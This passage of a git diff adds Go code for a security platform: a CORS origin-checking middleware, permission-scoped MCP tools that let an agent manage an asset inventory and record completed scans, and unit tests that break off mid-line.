+ ctx := context.Background() + if err := knowledgeIndexer.IndexMissing(ctx); err != nil { + logger.Warn("自动构建知识库索引失败", zap.Error(err)) + } + }() + + return knowledgeHandler, nil +} + +// corsMiddleware allows same-origin requests, valid Chromium extension +// origins, and exact origins explicitly configured by the operator. CORS is +// not an authentication boundary; API access still requires a valid session. +func corsMiddleware(configuredOrigins []string) gin.HandlerFunc { + allowedOrigins := make(map[string]struct{}, len(configuredOrigins)) + for _, origin := range configuredOrigins { + if normalized, ok := normalizeCORSOrigin(origin); ok { + allowedOrigins[normalized] = struct{}{} + } + } + + return func(c *gin.Context) { + origin := strings.TrimSpace(c.GetHeader("Origin")) + if origin != "" { + c.Writer.Header().Add("Vary", "Origin") + normalized, valid := normalizeCORSOrigin(origin) + _, explicitlyAllowed := allowedOrigins[normalized] + parsed, _ := url.Parse(origin) + sameHost := valid && strings.EqualFold(parsed.Host, c.Request.Host) + browserExtension := valid && isChromiumExtensionOrigin(parsed) + if !sameHost && !browserExtension && !explicitlyAllowed { + c.AbortWithStatusJSON(http.StatusForbidden, gin.H{"error": "cross-origin request denied"}) + return + } + c.Writer.Header().Set("Access-Control-Allow-Origin", origin) + c.Writer.Header().Set("Access-Control-Allow-Credentials", "true") + } + c.Writer.Header().Set("Access-Control-Allow-Headers", "Content-Type, Content-Length, Accept-Encoding, X-CSRF-Token, Authorization, accept, origin, Cache-Control, X-Requested-With") + c.Writer.Header().Set("Access-Control-Allow-Methods", "POST, OPTIONS, GET, PUT, DELETE") + c.Writer.Header().Set("Access-Control-Max-Age", "600") + + if c.Request.Method == "OPTIONS" { + c.AbortWithStatus(204) + return + } + + c.Next() + } +} + +// isChromiumExtensionOrigin accepts only Chrome's canonical 32-character +// extension IDs (letters a-p). It does not allow arbitrary custom schemes or +// web origins, and the extension must separately obtain host permission. +func isChromiumExtensionOrigin(origin *url.URL) bool { + if origin == nil || !strings.EqualFold(origin.Scheme, "chrome-extension") || origin.Port() != "" { + return false + } + id := strings.ToLower(origin.Hostname()) + if len(id) != 32 { + return false + } + for _, ch := range id { + if ch < 'a' || ch > 'p' { + return false + } + } + return true +} + +// normalizeCORSOrigin validates and canonicalizes a serialized origin. CORS +// origins never contain credentials, paths, query strings, or fragments. +func normalizeCORSOrigin(raw string) (string, bool) { + raw = strings.TrimSpace(raw) + if raw == "" || raw == "*" || strings.EqualFold(raw, "null") { + return "", false + } + parsed, err := url.Parse(raw) + if err != nil || parsed.Scheme == "" || parsed.Host == "" || parsed.User != nil || + (parsed.Path != "" && parsed.Path != "/") || parsed.RawQuery != "" || parsed.Fragment != "" { + return "", false + } + return strings.ToLower(parsed.Scheme) + "://" + strings.ToLower(parsed.Host), true +} diff --git a/internal/app/asset_tools.go b/internal/app/asset_tools.go new file mode 100644 index 00000000..611976d7 --- /dev/null +++ b/internal/app/asset_tools.go @@ -0,0 +1,511 @@ +package app + +import ( + "context" + "database/sql" + "encoding/json" + "fmt" + "strings" + "time" + + "cyberstrike-ai/internal/authctx" + "cyberstrike-ai/internal/database" + "cyberstrike-ai/internal/mcp" + "cyberstrike-ai/internal/mcp/builtin" + + "go.uber.org/zap" +) + +const agentAssetPageSizeMax = 50 + +func registerAssetTools(server *mcp.Server, db *database.DB, logger *zap.Logger) { + if server == nil || db == nil { + return + } + properties := assetMutationProperties() + + server.RegisterTool(mcp.Tool{ + Name: builtin.ToolCreateAsset, ShortDescription: "新增或去重更新资产", + Description: "向资产库新增资产。按目标+端口+协议去重;若资产已存在则更新非空字段。至少提供 host、ip、domain 之一。", + // Bedrock rejects tool schemas with top-level oneOf/allOf/anyOf. The + // host/ip/domain requirement is enforced by assetFromCreateArgs below. + InputSchema: map[string]interface{}{"type": "object", "properties": properties}, + }, func(ctx context.Context, args map[string]interface{}) (*mcp.ToolResult, error) { + asset, err := assetFromCreateArgs(args) + if err != nil { + return textResult("错误: "+err.Error(), true), nil + } + access, owner, global := assetAccessFromToolContext(ctx, "asset:write") + result, err := db.UpsertAssets([]*database.Asset{asset}, owner, global) + if err != nil { + logger.Error("Agent 保存资产失败", zap.Error(err)) + return textResult("错误: "+err.Error(), true), nil + } + if result.Skipped > 0 || asset.ID == "" { + return textResult("资产未保存:同一资产已存在但当前用户无权更新,或目标字段为空", true), nil + } + saved, err := db.GetAsset(asset.ID, access) + if err != nil { + return textResult("资产已保存,但无法读取结果: "+err.Error(), true), nil + } + action := "created" + if result.Updated > 0 { + action = "updated" + } + return assetJSONResult(map[string]interface{}{"action": action, "asset": assetToolDetail(saved)}) + }) + + server.RegisterTool(mcp.Tool{ + Name: builtin.ToolGetAsset, ShortDescription: "按 ID 查看资产详情", Description: "按资产 ID 返回完整资产详情。查询列表时先用 query_assets,避免一次拉取过多详情。", + InputSchema: map[string]interface{}{"type": "object", "properties": map[string]interface{}{"id": map[string]interface{}{"type": "string", "description": "资产 ID"}}, "required": []string{"id"}}, + }, func(ctx context.Context, args map[string]interface{}) (*mcp.ToolResult, error) { + projectID, projectScoped, err := agentAssetProjectScope(db, ctx) + if err != nil { + return textResult("错误: "+err.Error(), true), nil + } + asset, err := db.GetAsset(strings.TrimSpace(strArg(args, "id")), assetAccessOnly(ctx, "asset:read")) + if err != nil { + if err == sql.ErrNoRows { + return textResult("错误: 资产不存在或无权查看", true), nil + } + return textResult("错误: "+err.Error(), true), nil + } + if projectScoped && strings.TrimSpace(asset.ProjectID) != projectID { + return textResult("错误: 资产不存在或不属于当前对话绑定的项目", true), nil + } + return assetJSONResult(assetToolDetail(asset)) + }) + + server.RegisterTool(mcp.Tool{ + Name: builtin.ToolQueryAssets, ShortDescription: "灵活分页查询资产", + Description: "分页查询资产。支持精确字段、时间范围、扫描状态和白名单排序。查最久未扫描资产请使用 sort_by=last_scan_at、sort_order=asc;从未扫描资产会排在最前。默认每页 20 条,最大 50 条,返回精简摘要;使用 get_asset 获取单条详情。", + InputSchema: assetQuerySchema(), + }, func(ctx context.Context, args map[string]interface{}) (*mcp.ToolResult, error) { + filter, page, pageSize, err := assetFilterFromToolArgs(args) + if err != nil { + return textResult("错误: "+err.Error(), true), nil + } + projectID, projectScoped, err := agentAssetProjectScope(db, ctx) + if err != nil { + return textResult("错误: "+err.Error(), true), nil + } + if projectScoped { + // 对话绑定项目后,项目范围是服务端强制边界;不能通过工具参数扩大或切换范围。 + filter.ProjectID = projectID + } + items, total, err := db.ListAssets(pageSize, (page-1)*pageSize, filter, assetAccessOnly(ctx, "asset:read")) + if err != nil { + return textResult("错误: "+err.Error(), true), nil + } + totalPages := (total + pageSize - 1) / pageSize + if totalPages < 1 { + totalPages = 1 + } + var b strings.Builder + b.WriteString(fmt.Sprintf("资产查询:第 %d/%d 页,本页 %d 条,共 %d 条,page_size=%d\n", page, totalPages, len(items), total, pageSize)) + for _, asset := range items { + b.WriteString(formatAssetListItem(asset)) + b.WriteByte('\n') + } + if page < totalPages { + b.WriteString(fmt.Sprintf("下一页:保持筛选条件并设置 page=%d。", page+1)) + } + return textResult(b.String(), false), nil + }) + + updateProperties := assetMutationProperties() + updateProperties["id"] = map[string]interface{}{"type": "string", "description": "资产 ID"} + server.RegisterTool(mcp.Tool{ + Name: builtin.ToolUpdateAsset, ShortDescription: "局部更新资产", + Description: "按 ID 局部更新资产,只修改显式传入的字段;可传空 project_id 清除项目绑定,可传空 tags 清空标签。", + InputSchema: map[string]interface{}{"type": "object", "properties": updateProperties, "required": []string{"id"}}, + }, func(ctx context.Context, args map[string]interface{}) (*mcp.ToolResult, error) { + id := strings.TrimSpace(strArg(args, "id")) + access := assetAccessOnly(ctx, "asset:write") + asset, err := db.GetAsset(id, access) + if err != nil { + return textResult("错误: 资产不存在或无权更新", true), nil + } + if err := applyAssetPatch(asset, args); err != nil { + return textResult("错误: "+err.Error(), true), nil + } + if err := db.UpdateAsset(id, asset, access); err != nil { + return textResult("错误: "+err.Error(), true), nil + } + updated, err := db.GetAsset(id, access) + if err != nil { + return textResult("资产已更新,但无法读取结果: "+err.Error(), true), nil + } + return assetJSONResult(map[string]interface{}{"action": "updated", "asset": assetToolDetail(updated)}) + }) + + server.RegisterTool(mcp.Tool{ + Name: builtin.ToolDeleteAsset, ShortDescription: "删除资产", Description: "按 ID 永久删除资产记录。仅在用户明确要求删除时调用。", + InputSchema: map[string]interface{}{"type": "object", "properties": map[string]interface{}{"id": map[string]interface{}{"type": "string", "description": "资产 ID"}}, "required": []string{"id"}}, + }, func(ctx context.Context, args map[string]interface{}) (*mcp.ToolResult, error) { + id := strings.TrimSpace(strArg(args, "id")) + if err := db.DeleteAsset(id, assetAccessOnly(ctx, "asset:delete")); err != nil { + return textResult("错误: 资产不存在或无权删除", true), nil + } + return textResult("资产已删除: "+id, false), nil + }) + + server.RegisterTool(mcp.Tool{ + Name: builtin.ToolCompleteAssetScan, + ShortDescription: "完成资产扫描并回写结果", + Description: "目标扫描完成后调用:把资产的上次扫描时间更新为当前时间,并关联当前对话。相关漏洞数量不手填,而是自动统计当前扫描对话中通过 record_vulnerability 保存的漏洞。应在漏洞均已落库后调用;一个扫描对话建议只对应一个资产。", + InputSchema: map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "id": map[string]interface{}{"type": "string", "description": "已完成扫描的资产 ID"}, + }, + "required": []string{"id"}, + }, + }, func(ctx context.Context, args map[string]interface{}) (*mcp.ToolResult, error) { + id := strings.TrimSpace(strArg(args, "id")) + conversationID := conversationIDFromToolCtx(ctx) + if conversationID == "" { + return textResult("错误: 无法确定当前扫描对话", true), nil + } + access := assetAccessOnly(ctx, "asset:write") + if err := db.CompleteAssetScan(id, conversationID, access); err != nil { + if err == sql.ErrNoRows { + return textResult("错误: 资产不存在或无权回写扫描结果", true), nil + } + return textResult("错误: "+err.Error(), true), nil + } + updated, err := db.GetAsset(id, access) + if err != nil { + return textResult("扫描结果已回写,但无法读取资产: "+err.Error(), true), nil + } + return assetJSONResult(map[string]interface{}{ + "action": "scan_completed", + "message": "上次扫描时间已更新;相关漏洞数由当前扫描对话中已保存的漏洞自动计算", + "asset": assetToolDetail(updated), + }) + }) +} + +func assetMutationProperties() map[string]interface{} { + return map[string]interface{}{ + "project_id": map[string]interface{}{"type": "string"}, "host": map[string]interface{}{"type": "string"}, + "ip": map[string]interface{}{"type": "string"}, "port": map[string]interface{}{"type": "integer", "minimum": 0, "maximum": 65535}, + "domain": map[string]interface{}{"type": "string"}, "protocol": map[string]interface{}{"type": "string"}, + "title": map[string]interface{}{"type": "string"}, "server": map[string]interface{}{"type": "string"}, + "country": map[string]interface{}{"type": "string"}, "province": map[string]interface{}{"type": "string"}, "city": map[string]interface{}{"type": "string"}, + "responsible_person": map[string]interface{}{"type": "string"}, "department": map[string]interface{}{"type": "string"}, + "business_system": map[string]interface{}{"type": "string"}, + "environment": map[string]interface{}{"type": "string", "enum": []string{"production", "staging", "testing", "development", "other"}}, + "criticality": map[string]interface{}{"type": "string", "enum": []string{"critical", "high", "medium", "low"}}, + "source": map[string]interface{}{"type": "string"}, "source_query": map[string]interface{}{"type": "string"}, + "status": map[string]interface{}{"type": "string", "enum": []string{"active", "inactive"}}, + "tags": map[string]interface{}{"type": "array", "items": map[string]interface{}{"type": "string"}, "maxItems": 50}, + } +} + +func assetQuerySchema() map[string]interface{} { + properties := map[string]interface{}{ + "q": map[string]interface{}{"type": "string", "description": "模糊搜索 host、IP、域名、标题、服务和标签"}, + "project_id": map[string]interface{}{"type": "string"}, "status": map[string]interface{}{"type": "string", "enum": []string{"active", "inactive"}}, + "protocol": map[string]interface{}{"type": "string"}, "source": map[string]interface{}{"type": "string"}, "tag": map[string]interface{}{"type": "string"}, + "host": map[string]interface{}{"type": "string"}, "ip": map[string]interface{}{"type": "string"}, "domain": map[string]interface{}{"type": "string"}, + "port": map[string]interface{}{"type": "integer", "minimum": 0, "maximum": 65535}, + "risk_level": map[string]interface{}{"type": "string", "enum": []string{"unassessed", "critical", "high", "medium", "low", "info", "normal"}}, + "min_vulnerabilities": map[string]interface{}{"type": "integer", "minimum": 0}, + "max_vulnerabilities": map[string]interface{}{"type": "integer", "minimum": 0}, + "country": map[string]interface{}{"type": "string"}, "province": map[string]interface{}{"type": "string"}, "city": map[string]interface{}{"type": "string"}, + "responsible_person": map[string]interface{}{"type": "string"}, "department": map[string]interface{}{"type": "string"}, + "business_system": map[string]interface{}{"type": "string"}, "environment": map[string]interface{}{"type": "string"}, "criticality": map[string]interface{}{"type": "string"}, + "scan_state": map[string]interface{}{"type": "string", "enum": []string{"never", "scanned"}, "description": "never=从未扫描,scanned=扫描过"}, + "scan_overdue_days": map[string]interface{}{"type": "integer", "minimum": 1}, + "last_scan_before": map[string]interface{}{"type": "string", "description": "RFC3339 时间或 YYYY-MM-DD"}, + "last_scan_after": map[string]interface{}{"type": "string", "description": "RFC3339 时间或 YYYY-MM-DD"}, + "first_seen_before": map[string]interface{}{"type": "string", "description": "RFC3339 时间或 YYYY-MM-DD"}, + "first_seen_after": map[string]interface{}{"type": "string", "description": "RFC3339 时间或 YYYY-MM-DD"}, + "last_seen_before": map[string]interface{}{"type": "string", "description": "RFC3339 时间或 YYYY-MM-DD"}, + "last_seen_after": map[string]interface{}{"type": "string", "description": "RFC3339 时间或 YYYY-MM-DD"}, + "sort_by": map[string]interface{}{"type": "string", "enum": []string{"last_seen_at", "last_scan_at", "first_seen_at", "created_at", "updated_at", "host", "port", "risk_level", "vulnerability_count"}}, + "sort_order": map[string]interface{}{"type": "string", "enum": []string{"asc", "desc"}}, + "page": map[string]interface{}{"type": "integer", "minimum": 1}, + "page_size": map[string]interface{}{"type": "integer", "minimum": 1, "maximum": agentAssetPageSizeMax}, + } + return map[string]interface{}{"type": "object", "properties": properties} +} + +func assetFromCreateArgs(args map[string]interface{}) (*database.Asset, error) { + asset := &database.Asset{} + if err := applyAssetPatch(asset, args); err != nil { + return nil, err + } + if strings.TrimSpace(asset.Host) == "" && strings.TrimSpace(asset.IP) == "" && strings.TrimSpace(asset.Domain) == "" { + return nil, fmt.Errorf("host、ip、domain 至少需要一个") + } + return asset, nil +} + +func applyAssetPatch(asset *database.Asset, args map[string]interface{}) error { + setString := func(key string, dst *string) { + if _, ok := args[key]; ok { + *dst = strings.TrimSpace(strArg(args, key)) + } + } + setString("project_id", &asset.ProjectID) + setString("host", &asset.Host) + setString("ip", &asset.IP) + setString("domain", &asset.Domain) + setString("protocol", &asset.Protocol) + setString("title", &asset.Title) + setString("server", &asset.Server) + setString("country", &asset.Country) + setString("province", &asset.Province) + setString("city", &asset.City) + setString("responsible_person", &asset.ResponsiblePerson) + setString("department", &asset.Department) + setString("business_system", &asset.BusinessSystem) + setString("environment", &asset.Environment) + setString("criticality", &asset.Criticality) + setString("source", &asset.Source) + setString("source_query", &asset.SourceQuery) + setString("status", &asset.Status) + if _, ok := args["port"]; ok { + port := intArg(args, "port", -1) + if port < 0 || port > 65535 { + return fmt.Errorf("port 必须在 0-65535 之间") + } + asset.Port = port + } + if raw, ok := args["tags"]; ok { + tags, err := stringSliceArg(raw) + if err != nil { + return fmt.Errorf("tags: %w", err) + } + asset.Tags = tags + } + return nil +} + +func assetFilterFromToolArgs(args map[string]interface{}) (database.AssetListFilter, int, int, error) { + filter := database.AssetListFilter{ + Search: strings.TrimSpace(strArg(args, "q")), ProjectID: strings.TrimSpace(strArg(args, "project_id")), Status: strings.ToLower(strings.TrimSpace(strArg(args, "status"))), + Protocol: strings.ToLower(strings.TrimSpace(strArg(args, "protocol"))), Source: strings.TrimSpace(strArg(args, "source")), Tag: strings.TrimSpace(strArg(args, "tag")), + Host: strings.TrimSpace(strArg(args, "host")), IP: strings.TrimSpace(strArg(args, "ip")), Domain: strings.TrimSpace(strArg(args, "domain")), + ScanState: strings.ToLower(strings.TrimSpace(strArg(args, "scan_state"))), SortBy: strings.ToLower(strings.TrimSpace(strArg(args, "sort_by"))), + SortOrder: strings.ToLower(strings.TrimSpace(strArg(args, "sort_order"))), + RiskLevel: strings.ToLower(strings.TrimSpace(strArg(args, "risk_level"))), + Country: strings.TrimSpace(strArg(args, "country")), Province: strings.TrimSpace(strArg(args, "province")), City: strings.TrimSpace(strArg(args, "city")), + ResponsiblePerson: strings.TrimSpace(strArg(args, "responsible_person")), Department: strings.TrimSpace(strArg(args, "department")), + BusinessSystem: strings.TrimSpace(strArg(args, "business_system")), Environment: strings.ToLower(strings.TrimSpace(strArg(args, "environment"))), + Criticality: strings.ToLower(strings.TrimSpace(strArg(args, "criticality"))), + } + if !oneOfOrEmpty(filter.Status, "active", "inactive") { + return filter, 0, 0, fmt.Errorf("status 仅支持 active 或 inactive") + } + if !oneOfOrEmpty(filter.ScanState, "never", "scanned") { + return filter, 0, 0, fmt.Errorf("scan_state 仅支持 never 或 scanned") + } + if !oneOfOrEmpty(filter.SortBy, "last_seen_at", "last_scan_at", "first_seen_at", "created_at", "updated_at", "host", "port", "risk_level", "vulnerability_count") { + return filter, 0, 0, fmt.Errorf("sort_by 不受支持") + } + if !oneOfOrEmpty(filter.SortOrder, "asc", "desc") { + return filter, 0, 0, fmt.Errorf("sort_order 仅支持 asc 或 desc") + } + if _, ok := args["port"]; ok { + port := intArg(args, "port", -1) + if port < 0 || port > 65535 { + return filter, 0, 0, fmt.Errorf("port 必须在 0-65535 之间") + } + filter.Port = &port + } + if _, ok := args["min_vulnerabilities"]; ok { + value := intArg(args, "min_vulnerabilities", -1) + if value < 0 { + return filter, 0, 0, fmt.Errorf("min_vulnerabilities 不能小于 0") + } + filter.MinVulnerabilities = &value + } + if _, ok := args["max_vulnerabilities"]; ok { + value := intArg(args, "max_vulnerabilities", -1) + if value < 0 { + return filter, 0, 0, fmt.Errorf("max_vulnerabilities 不能小于 0") + } + filter.MaxVulnerabilities = &value + } + if _, ok := args["scan_overdue_days"]; ok { + value := intArg(args, "scan_overdue_days", 0) + if value < 1 { + return filter, 0, 0, fmt.Errorf("scan_overdue_days 必须大于 0") + } + filter.ScanOverdueDays = &value + } + var err error + if filter.LastScanBefore, err = parseAssetToolTime("last_scan_before", strArg(args, "last_scan_before")); err != nil { + return filter, 0, 0, err + } + if filter.LastScanAfter, err = parseAssetToolTime("last_scan_after", strArg(args, "last_scan_after")); err != nil { + return filter, 0, 0, err + } + if filter.FirstSeenBefore, err = parseAssetToolTime("first_seen_before", strArg(args, "first_seen_before")); err != nil { + return filter, 0, 0, err + } + if filter.FirstSeenAfter, err = parseAssetToolTime("first_seen_after", strArg(args, "first_seen_after")); err != nil { + return filter, 0, 0, err + } + if filter.LastSeenBefore, err = parseAssetToolTime("last_seen_before", strArg(args, "last_seen_before")); err != nil { + return filter, 0, 0, err + } + if filter.LastSeenAfter, err = parseAssetToolTime("last_seen_after", strArg(args, "last_seen_after")); err != nil { + return filter, 0, 0, err + } + page := intArg(args, "page", 1) + pageSize := intArg(args, "page_size", 20) + if page < 1 || page > 1_000_000 { + return filter, 0, 0, fmt.Errorf("page 必须在 1-1000000 之间") + } + if pageSize < 1 || pageSize > agentAssetPageSizeMax { + return filter, 0, 0, fmt.Errorf("page_size 必须在 1-%d 之间", agentAssetPageSizeMax) + } + return filter, page, pageSize, nil +} + +func oneOfOrEmpty(value string, allowed ...string) bool { + if value == "" { + return true + } + for _, candidate := range allowed { + if value == candidate { + return true + } + } + return false +} + +func parseAssetToolTime(field, value string) (*time.Time, error) { + value = strings.TrimSpace(value) + if value == "" { + return nil, nil + } + for _, layout := range []string{time.RFC3339, "2006-01-02"} { + if parsed, err := time.Parse(layout, value); err == nil { + return &parsed, nil + } + } + return nil, fmt.Errorf("%s 必须是 RFC3339 时间或 YYYY-MM-DD", field) +} + +func stringSliceArg(raw interface{}) ([]string, error) { + values := []string{} + switch typed := raw.(type) { + case []string: + values = append(values, typed...) + case []interface{}: + for _, item := range typed { + value, ok := item.(string) + if !ok { + return nil, fmt.Errorf("必须是字符串数组") + } + values = append(values, value) + } + default: + return nil, fmt.Errorf("必须是字符串数组") + } + if len(values) > 50 { + return nil, fmt.Errorf("最多 50 个标签") + } + return values, nil +} + +func assetAccessOnly(ctx context.Context, permission string) database.RBACListAccess { + principal, ok := authctx.PrincipalFromContext(ctx) + if !ok { + return database.RBACListAccess{} + } + return database.RBACListAccess{UserID: principal.UserID, Scope: principal.ScopeFor(permission)} +} + +func assetAccessFromToolContext(ctx context.Context, permission string) (database.RBACListAccess, string, bool) { + principal, ok := authctx.PrincipalFromContext(ctx) + if !ok { + return database.RBACListAccess{}, "", false + } + access := database.RBACListAccess{UserID: principal.UserID, Scope: principal.ScopeFor(permission)} + return access, principal.UserID, access.Scope == database.RBACScopeAll +} + +// agentAssetProjectScope returns the hard asset-read boundary implied by the +// current conversation. An unbound conversation (or a tool call outside a +// conversation) keeps the existing all-accessible-assets behavior. A bound +// conversation can only read assets assigned to that exact project. +func agentAssetProjectScope(db *database.DB, ctx context.Context) (projectID string, scoped bool, err error) { + conversationID := conversationIDFromToolCtx(ctx) + if conversationID == "" { + return "", false, nil + } + projectID, err = db.GetConversationProjectID(conversationID) + if err != nil { + return "", false, fmt.Errorf("无法确定当前对话的项目范围") + } + projectID = strings.TrimSpace(projectID) + return projectID, projectID != "", nil +} + +func formatAssetListItem(asset *database.Asset) string { + target := asset.Domain + if target == "" { + target = asset.IP + } + if target == "" { + target = asset.Host + } + if asset.Port > 0 { + target = fmt.Sprintf("%s:%d", target, asset.Port) + } + lastScan := "never" + if asset.LastScanAt != nil { + lastScan = asset.LastScanAt.Format(time.RFC3339) + } + return fmt.Sprintf("- id=%s | target=%s | protocol=%s | status=%s | last_scan_at=%s | risk=%s | vulnerabilities=%d", asset.ID, truncateRunes(target, 120), truncateRunes(asset.Protocol, 30), truncateRunes(asset.Status, 30), lastScan, asset.RiskLevel, asset.VulnerabilityCount) +} + +// assetToolDetail keeps even a single unusually large imported record from +// consuming the model context. The database and HTTP API retain full values. +func assetToolDetail(asset *database.Asset) map[string]interface{} { + if asset == nil { + return nil + } + tags := make([]string, 0, len(asset.Tags)) + for i, tag := range asset.Tags { + if i >= 50 { + break + } + tags = append(tags, truncateRunes(tag, 100)) + } + detail := map[string]interface{}{ + "id": asset.ID, "project_id": asset.ProjectID, "project_name": truncateRunes(asset.ProjectName, 200), + "host": truncateRunes(asset.Host, 500), "ip": truncateRunes(asset.IP, 100), "port": asset.Port, + "domain": truncateRunes(asset.Domain, 255), "protocol": truncateRunes(asset.Protocol, 50), + "title": truncateRunes(asset.Title, 500), "server": truncateRunes(asset.Server, 500), + "country": truncateRunes(asset.Country, 100), "province": truncateRunes(asset.Province, 100), "city": truncateRunes(asset.City, 100), + "responsible_person": truncateRunes(asset.ResponsiblePerson, 255), "department": truncateRunes(asset.Department, 255), + "business_system": truncateRunes(asset.BusinessSystem, 255), "environment": asset.Environment, "criticality": asset.Criticality, + "source": truncateRunes(asset.Source, 100), "source_query": truncateRunes(asset.SourceQuery, 2000), + "status": truncateRunes(asset.Status, 50), "tags": tags, + "first_seen_at": asset.FirstSeenAt, "last_seen_at": asset.LastSeenAt, "created_at": asset.CreatedAt, "updated_at": asset.UpdatedAt, + "last_scan_conversation_id": asset.LastScanConversationID, "last_scan_queue_id": asset.LastScanQueueID, "last_scan_task_id": asset.LastScanTaskID, + "vulnerability_count": asset.VulnerabilityCount, "risk_level": asset.RiskLevel, + } + if asset.LastScanAt != nil { + detail["last_scan_at"] = asset.LastScanAt + } + if len(asset.Tags) > len(tags) { + detail["tags_truncated"] = true + } + return detail +} + +func assetJSONResult(value interface{}) (*mcp.ToolResult, error) { + encoded, err := json.MarshalIndent(value, "", " ") + if err != nil { + return textResult("错误: "+err.Error(), true), nil + } + return textResult(string(encoded), false), nil +} diff --git a/internal/app/asset_tools_test.go b/internal/app/asset_tools_test.go new file mode 100644 index 00000000..9cb491b7 --- /dev/null +++ b/internal/app/asset_tools_test.go @@ -0,0 +1,201 @@ +package app + +import ( + "context" + "path/filepath" + "strings" + "testing" + + "cyberstrike-ai/internal/authctx" + "cyberstrike-ai/internal/database" + "cyberstrike-ai/internal/mcp" + "cyberstrike-ai/internal/mcp/builtin" + + "go.uber.org/zap" +) + +func TestAssetToolsCRUDQueryAndPageLimit(t *testing.T) { + db, err := database.NewDB(filepath.Join(t.TempDir(), "asset-tools.db"), zap.NewNop()) + if err != nil { + t.Fatal(err) + } + defer db.Close() + user, err := db.CreateRBACUser("asset-agent", "Asset Agent", "hash", true, nil) + if err != nil { + t.Fatal(err) + } + principal := authctx.NewPrincipal(user.ID, user.Username, database.RBACScopeAssigned, map[string]bool{ + "asset:read": true, "asset:write": true, "asset:delete": true, + }) + ctx := authctx.WithPrincipal(context.Background(), principal) + server := mcp.NewServer(zap.NewNop()) + server.SetToolAuthorizer(mcpToolAuthorizer(db)) + registerAssetTools(server, db, zap.NewNop()) + + wantTools := map[string]bool{ + builtin.ToolCreateAsset: false, builtin.ToolGetAsset: false, builtin.ToolQueryAssets: false, + builtin.ToolUpdateAsset: false, builtin.ToolDeleteAsset: false, builtin.ToolCompleteAssetScan: false, + } + for _, tool := range server.GetAllTools() { + if _, ok := wantTools[tool.Name]; ok { + wantTools[tool.Name] = true + } + } + for name, found := range wantTools { + if !found { + t.Fatalf("asset tool not registered: %s", name) + } + } + + for _, tool := range server.GetAllTools() { + if tool.Name != builtin.ToolCreateAsset { + continue + } + for _, keyword := range []string{"oneOf", "allOf", "anyOf"} { + if _, exists := tool.InputSchema[keyword]; exists { + t.Fatalf("create asset schema contains Bedrock-incompatible top-level %s", keyword) + } + } + } + + result, _, err := server.CallTool(ctx, builtin.ToolCreateAsset, map[string]interface{}{"title": "Missing target"}) + if err != nil || result == nil || !result.IsError { + t.Fatalf("create asset accepted missing host/ip/domain: result=%#v err=%v", result, err) + } + + result, _, err = server.CallTool(ctx, builtin.ToolCreateAsset, map[string]interface{}{ + "ip": "192.0.2.42", "port": 443, "protocol": "https", "title": "Before", "tags": []interface{}{"prod"}, + }) + if err != nil || result == nil || result.IsError { + t.Fatalf("create asset result=%#v err=%v", result, err) + } + assets, total, err := db.ListAssets(20, 0, database.AssetListFilter{}, database.RBACListAccess{UserID: user.ID, Scope: database.RBACScopeAssigned}) + if err != nil || total != 1 || len(assets) != 1 { + t.Fatalf("saved assets total=%d len=%d err=%v", total, len(assets), err) + } + id := assets[0].ID + + result, _, err = server.CallTool(ctx, builtin.ToolUpdateAsset, map[string]interface{}{"id": id, "title": "After"}) + if err != nil || result == nil || result.IsError { + t.Fatalf("update asset result=%#v err=%v", result, err) + } + updated, err := db.GetAsset(id, database.RBACListAccess{UserID: user.ID, Scope: database.RBACScopeAssigned}) + if err != nil || updated.Title != "After" || updated.IP != "192.0.2.42" { + t.Fatalf("partial update lost fields: %#v err=%v", updated, err) + } + + result, _, err = server.CallTool(ctx, builtin.ToolQueryAssets, map[string]interface{}{ + "sort_by": "last_scan_at", "sort_order": "asc", "page": 1, "page_size": 1, + }) + if err != nil || result == nil || result.IsError || !strings.Contains(toolResultText(result), "第 1/1 页") || !strings.Contains(toolResultText(result), "last_scan_at=never") { + t.Fatalf("query asset result=%#v err=%v", result, err) + } + result, _, err = server.CallTool(ctx, builtin.ToolQueryAssets, map[string]interface{}{"page_size": agentAssetPageSizeMax + 1}) + if err != nil || result == nil || !result.IsError { + t.Fatalf("oversized page was accepted: result=%#v err=%v", result, err) + } + + conversation, err := db.CreateConversation("asset scan", database.ConversationCreateMeta{}) + if err != nil { + t.Fatal(err) + } + if err := db.AssignResourceToUser(user.ID, "conversation", conversation.ID); err != nil { + t.Fatal(err) + } + if _, err := db.CreateVulnerability(&database.Vulnerability{ConversationID: conversation.ID, Title: "finding", Severity: "high", Target: "192.0.2.42"}); err != nil { + t.Fatal(err) + } + scanCtx := mcp.WithMCPConversationID(ctx, conversation.ID) + result, _, err = server.CallTool(scanCtx, builtin.ToolCompleteAssetScan, map[string]interface{}{"id": id}) + if err != nil || result == nil || result.IsError { + t.Fatalf("complete scan result=%#v err=%v", result, err) + } + scanned, err := db.GetAsset(id, database.RBACListAccess{UserID: user.ID, Scope: database.RBACScopeAssigned}) + if err != nil || scanned.LastScanAt == nil || scanned.LastScanConversationID != conversation.ID || scanned.VulnerabilityCount != 1 { + t.Fatalf("scan fields not updated: %#v err=%v", scanned, err) + } + + result, _, err = server.CallTool(ctx, builtin.ToolDeleteAsset, map[string]interface{}{"id": id}) + if err != nil || result == nil || result.IsError { + t.Fatalf("delete asset result=%#v err=%v", result, err) + } + if _, err := db.GetAsset(id, database.RBACListAccess{Scope: database.RBACScopeAll}); err == nil { + t.Fatal("asset still exists after delete") + } +} + +func toolResultText(result *mcp.ToolResult) string { + var b strings.Builder + if result == nil { + return "" + } + for _, content := range result.Content { + b.WriteString(content.Text) + } + return b.String() +} + +func TestAssetReadToolsRespectConversationProjectScope(t *testing.T) { + db, err := database.NewDB(filepath.Join(t.TempDir(), "asset-project-scope.db"), zap.NewNop()) + if err != nil { + t.Fatal(err) + } + defer db.Close() + + projectA, err := db.CreateProject(&database.Project{Name: "Project A"}) + if err != nil { + t.Fatal(err) + } + projectB, err := db.CreateProject(&database.Project{Name: "Project B"}) + if err != nil { + t.Fatal(err) + } + assets := []*database.Asset{ + {ProjectID: projectA.ID, IP: "192.0.2.10", Protocol: "https"}, + {ProjectID: projectB.ID, IP: "192.0.2.20", Protocol: "https"}, + {IP: "192.0.2.30", Protocol: "https"}, + } + if result, err := db.UpsertAssets(assets, "", true); err != nil || result.Created != len(assets) { + t.Fatalf("seed assets result=%#v err=%v", result, err) + } + + bound, err := db.CreateConversation("bound", database.ConversationCreateMeta{ProjectID: projectA.ID}) + if err != nil { + t.Fatal(err) + } + unbound, err := db.CreateConversation("unbound", database.ConversationCreateMeta{}) + if err != nil { + t.Fatal(err) + } + principal := authctx.NewPrincipal("admin", 